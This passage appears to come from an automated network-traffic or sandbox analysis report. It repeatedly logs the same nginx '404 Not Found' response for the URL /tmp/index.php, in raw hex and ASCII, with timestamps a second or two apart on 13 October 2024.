75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL 